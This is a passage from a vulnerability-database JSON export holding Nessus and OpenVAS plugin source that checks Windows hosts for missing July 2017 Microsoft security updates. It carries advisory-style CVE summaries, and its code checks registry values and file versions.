Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101375);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99408,\n 99409,\n 
99410,\n 99412,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025331\");\n script_xref(name:\"MSFT\", value:\"MS17-4025331\");\n script_xref(name:\"MSKB\", value:\"4025343\");\n script_xref(name:\"MSFT\", value:\"MS17-4025343\");\n\n script_name(english:\"Windows Server 2012 July 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025343\nor cumulative update 4025331. It is, therefore, affected by\nmultiple vulnerabilities :\n\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. 
A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in the\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. 
An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. 
(CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8610)\");\n # https://support.microsoft.com/en-us/help/4025331/windows-server-2012-update-kb4025331\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23066c63\");\n # https://support.microsoft.com/en-us/help/4025343/windows-server-2012-update-kb4025343\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6eb83bb8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4025343 or Cumulative update KB4025331.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8589\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-07';\nkbs = make_list(\n '4025331', # 2012 Monthly Rollup\n '4025343' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = FALSE;\n\n# CVE-2017-8563 applies to Server 2012 and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key 
\"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"07_2017\", bulletin:bulletin, rollup_kb_list:[4025331,4025343]) || vuln)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:08", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft browsers improperly handle redirect requests.\n The vulnerability allows Microsoft browsers to bypass\n CORS redirect restrictions, and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited the vulnerability could force\n the browser to send data that would otherwise be\n restricted to a destination website of the attacker's\n choice. (CVE-2017-8592)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. 
In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked \"safe for\n initialization\" in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. (CVE-2017-8618)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2017-8594)", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-30T00:00:00", "title": "Security Updates for Internet Explorer (July 2017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8608", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8594", "CVE-2017-8592", "CVE-2017-8602", "CVE-2017-8618"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS17_JUL_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104891", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104891);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8592\",\n \"CVE-2017-8594\",\n \"CVE-2017-8602\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99390,\n 99396,\n 99399,\n 99401,\n 99408,\n 99410,\n 99412\n );\n script_xref(name:\"MSKB\", value:\"4025336\");\n script_xref(name:\"MSKB\", value:\"4025331\");\n script_xref(name:\"MSKB\", value:\"4025341\");\n script_xref(name:\"MSKB\", value:\"4025252\");\n script_xref(name:\"MSFT\", value:\"MS17-4025336\");\n script_xref(name:\"MSFT\", value:\"MS17-4025331\");\n script_xref(name:\"MSFT\", value:\"MS17-4025341\");\n script_xref(name:\"MSFT\", value:\"MS17-4025252\");\n\n script_name(english:\"Security Updates for Internet Explorer (July 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft browsers improperly handle redirect requests.\n The vulnerability allows Microsoft browsers to bypass\n CORS redirect restrictions, and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited the vulnerability could force\n the browser to send data that would otherwise be\n restricted to a destination website of the attacker's\n choice. (CVE-2017-8592)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked "safe for\n initialization" in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. 
(CVE-2017-8618)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8594)\");\n # https://support.microsoft.com/en-us/help/4025336/windows-8-update-kb4025336\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60b27ab9\");\n # https://support.microsoft.com/en-us/help/4025331/windows-server-2012-update-kb4025331\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23066c63\");\n # https://support.microsoft.com/en-us/help/4025341/windows-7-update-kb4025341\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?38156f30\");\n # https://support.microsoft.com/en-us/help/4025252/cumulative-security-update-for-internet-explorer-july-11-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9951911\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-07';\nkbs = make_list(\n '4025336',\n '4025331',\n '4025341',\n '4025252'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18739\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22207\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", 
version:\"11.0.9600.18739\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n\n # Vista / Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21029\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16918\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4025252 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4025336 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-07', kb:'4025336', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4025331 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-07', kb:'4025331', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4025341 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-07', kb:'4025341', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-08T13:50:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", 
"CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025339", "modified": "2019-12-20T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811515", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811515", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025339)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025339)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811515\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8592\", \"CVE-2017-8595\", \"CVE-2017-8596\", \"CVE-2017-8598\",\n \"CVE-2017-8599\", \"CVE-2017-8601\", \"CVE-2017-8602\", \"CVE-2017-0170\",\n \"CVE-2017-8463\", \"CVE-2017-8603\", \"CVE-2017-8604\", \"CVE-2017-8605\",\n \"CVE-2017-8606\", \"CVE-2017-8607\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8608\", \"CVE-2017-8609\", \"CVE-2017-8611\", \"CVE-2017-8618\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8619\", \"CVE-2017-8557\",\n \"CVE-2017-8561\", \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\",\n \"CVE-2017-8565\", \"CVE-2017-8566\", \"CVE-2017-8573\", \"CVE-2017-8574\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\",\n \"CVE-2017-8582\", \"CVE-2017-8584\", \"CVE-2017-8585\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:39:04 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025339)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025339\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists 
when,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address,\n allowing an attacker to retrieve information that could lead to a Kernel Address\n Space Layout Randomization (KASLR) bypass.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft Browsers improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly 